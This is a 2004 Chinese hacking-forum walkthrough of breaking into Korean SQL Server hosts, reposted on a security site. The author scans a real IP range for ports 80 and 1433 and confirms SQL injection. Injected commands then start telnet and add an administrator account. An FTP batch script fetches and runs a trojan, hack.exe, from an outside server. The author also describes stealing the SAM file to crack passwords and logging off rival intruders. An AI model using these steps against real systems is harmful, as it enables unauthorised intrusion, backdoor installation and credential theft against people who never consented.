首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
我是这样走进韩国机器的
来源:火狐技术论坛 作者:dalong 发布时间:2004-12-06  

我是这样走进韩国机器的

由于最近要破解一个文件迫切需要一台"高速"肉鸡用,所以想找个现成的,发现很多论坛发布sql肉鸡,不过经过我测试(利用sqltools上传程序,提示成功,但就是找不到文件)很多都不能用,可能对方的杀毒软件把你的给杀了,也可能是对方的磁盘不允许修改,帐户权限低,下面我们换一种思路来走进sql主机。

为了找到一台合适的肉鸡,自己来动手吧,首先锁定目标,用ip数据库查询器查找韩国或者日本的ip(只要不是中国的就行),拿出scanner来扫描开放80和1433端口的主机,因为我们是利用web程序来查找开放大门主机,所以要扫描开放1433服务的主机。cmd下进入scanner所在的目录,输入命令:scanner TCP 168.188.0.0 168.188.255.255 80,1433 400 /save 然后运行,意思是系统用400线程扫描该段80和1433端口开放的主机,并将结果保存,好了,让他扫描吧,扫描结束后在该目录下的result.txt中保存结果。打开result.txt,里面已经有不少符合条件主机等着我们的光临。随便复制一个ip 168.188.xxx.xxx,打开浏览器,访问该网站,访问该网站的分页面,http://168.188.xxx.xxx/read.asp?page=1&no=16,在后面加入的and 1=1页面显示正常,输入 and 1=2出现错误:

Microsoft OLE DB Provider for SQL Server error ’80040e14’

Incorrect syntax near the keyword ’where’.

/movie/movie.asp, line 128

好,该主机存在漏洞,那就拿下他。这次我用另外一个小工具GYSIcmd来打开进入主机的小门,该工具能够利用利用网站程序漏洞运行DOS命令,在注入地址中输入http://168.188.xxx.xxx/read.asp?page=1&no=16,然后在DOS命令中输入net start telnet ,现在已开启了telnet服务,接着执行net user qq qq123 /add为进入主机添加一个帐号,提升为管理员net localgroup administrators qq /add ,到此已经完成了进入前的准备工作.
下面在为进入主机铺上一条小路,我们好从这上面走过去呀。 在桌面上新建一个CMD快捷方式,指向C:\WINNT\system32\CMD.EXE ,选中属性中的以其他用户身份运行。现在运行该程序,在用户中用我们刚才建立的用户qq(qq123)运行,直接运行telnet 168.188.xxx.xxx ,提示是否发送密码,输入y,这就进入了主机。呵呵,偷偷的进了人家屋里了,该控制了,下面来给它传文件,传个反弹木马,或者开3389,由于我的速度很慢,就不在我机子上开tftp服务了,直接用一个批处理文件来传送,输入:

echo open ftp.myweb.com 21>ftp.txt
echo name>>ftp.txt
echo password>>ftp.txt
echo get hack.exe>>ftp.txt
echo bye

一次一行,输入完后就在对方根目录下有了一个文件ftp.txt,下面执行:
ftp -s:ftp.txt
在屏幕上可看到一行行的显示执行,你能看到执行的过程,他是看不到的,文件传完了,删除该文件del ftp.txt
运行hack.exe,好,打开我机子上的鸽子,显示有主机上线,呵呵,到手了,任务完成了,想干什么就做吧,不过奉劝一句,不要破坏,即使是国外的机子,要不要删他的数据,除非反华的或者色情站点。如果想更方便的控制,可给他开3389。然后登陆3389进行管理,帮他补上漏洞(作雷锋了)..
在我进入的主机中,碰到的情况是不一样的,有的主机已开了3389,可以利用命令query user 查看主机在线人员,如果管理员在线,通时还有人使用3389登陆到了主机,那么很可能就是已经被人捷足先登了,踢他出去logoff 1 ,怎么办在自己了.
如果传送上去的文件无法运行,那就说明对方已经禁止运行权限,只是允许某个特定的用户有运行权限,这时可以传他的sam文件,进入C:\WINNT\repair>目录,利用FTP的上传功能,来破解他的用户密码。破解sam密码的软件很多,如LC,最近不是出了一款新的,好象叫SAMinside.破解出来密码后,挨着试试,一般不会超过6个用户,定有一个帐户有运行权限。如果都不行,那么还有一个方法...不过该方法虽能运行,但运行后管理员登陆就能发现主机被人入侵,所以就不说了,谁有更好后的办法运行,多多指教。
方法不局限于一点 一个学习网络安全的爱好者 也切忌把自己的思维固定在一点 ,一定要活跃 还要在踏上这条路的时候 一定要学会好好使用搜索引擎和独立思考的习惯\因为你一开始就是一个黑暗中孤独的天使啊\唯一依靠自己才是最好的武器啊

本次用到的都是以前的一些知识,进入主机的方法很多,每一个端口都是打开主机的小门,只要好好利用,都会发挥很大的作用。我正在积极争取加入火狐认证会员,希望大家支持。有更好的方法或什么意见加我qq332730303
最后感谢老大(^_^1+1=零√0)的关心和帮助.



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·Guest权限提升方法总结
·黑客攻击Solaris系统DNS服务
·PHP+MySQL注入导出文件的新发现
·史上最强破解XP口令方法
·Winamp 'in_cdda' 模块的调试以
·NBSI注入分析跟踪报告(MSSQL篇)
·利用%5c绕过密码验证
·记一次渗透空间服务器的艰难之旅
·DISCUZ2上传漏洞分析,上传漏洞变
·dvsp2上传漏洞再现--击溃动网sp2
·QQ2004 sp1加密文件结构和加密算
·NBSI2内部功能实现大揭谜
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved